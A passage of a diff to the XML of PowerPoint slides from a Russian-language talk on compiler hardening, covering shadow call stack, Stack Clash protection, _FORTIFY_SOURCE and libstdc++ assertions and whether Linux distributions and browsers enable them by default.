+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=shadow-call-stack</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в дистрибутивах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clash</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Статус на </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>неясен (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>compiler-flags-distro #12</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
+              <a:t>Защита не включена по умолчанию в дистрибутивах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и браузерах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome/Firefox</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>На </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian 12 (stable) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не защищены даже уязвимые программы: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>bash, bzip2, curl, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ffmpeg</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>perl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, python, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует защиту от </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Clash (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>BZ #1852202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>), </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>а </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -34916,7 +35322,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C614A2F-E5F3-45F9-86A4-52A24EAE633A}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8A2AE2-629B-42FD-9E28-E4A1D19A5BF3}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34943,7 +35349,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494840990"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1796431697"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -34975,7 +35381,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFADEC6-171D-4ACB-9FCC-86BE492CE91F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -34993,11 +35399,11 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>_FORTIFY_SOURCE: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
+              <a:t>Stack Clashing: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как использовать</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -35011,7 +35417,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C3255C-F753-4543-BECB-F71864F2D5F2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35022,277 +35428,235 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="838200" y="1834590"/>
-            <a:ext cx="10515600" cy="4351338"/>
-          </a:xfrm>
-        </p:spPr>
+        <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для явного включения используются макросы </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
+              <a:t>Включен по умолчанию только в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется явно указывать флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>или </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-clash-protection</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока не появится </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
-              </a:rPr>
-              <a:t></a:t>
+              <a:t>Пакеты в Debian</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ubuntu собираются с этим флагом</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в дистрибутивах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Clash</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Статус на </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>неясен (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>compiler-flags-distro #12</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по умолчанию в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не включена в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> не включена по умолчанию нигде</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>пакеты дефолтно собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>с 2023</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>На </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (stable) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не защищены даже уязвимые программы: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>bash, bzip2, curl, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>ffmpeg</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>perl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, python, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует защиту от </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Clash (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>BZ #1852202</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>), </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>а </a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>Chrome </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>собираются с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-D_FORTIFY_SOURCE=2</a:t>
-            </a:r>
+              <a:t>нет</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -35301,7 +35665,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2953379-E1A6-429C-9D89-03490548E8EF}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C614A2F-E5F3-45F9-86A4-52A24EAE633A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35328,7 +35692,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1952923550"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494840990"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -35360,7 +35724,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFADEC6-171D-4ACB-9FCC-86BE492CE91F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35378,7 +35742,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL hardening: </a:t>
+              <a:t>_FORTIFY_SOURCE: </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -35396,7 +35760,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C3255C-F753-4543-BECB-F71864F2D5F2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -35407,7 +35771,12 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1834590"/>
+            <a:ext cx="10515600" cy="4351338"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr>
             <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
@@ -35415,35 +35784,108 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Libstdc++:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Для явного включения используются макросы </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(дефолтная </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
+              <a:t>Пока не появится </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=4</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t></a:t>
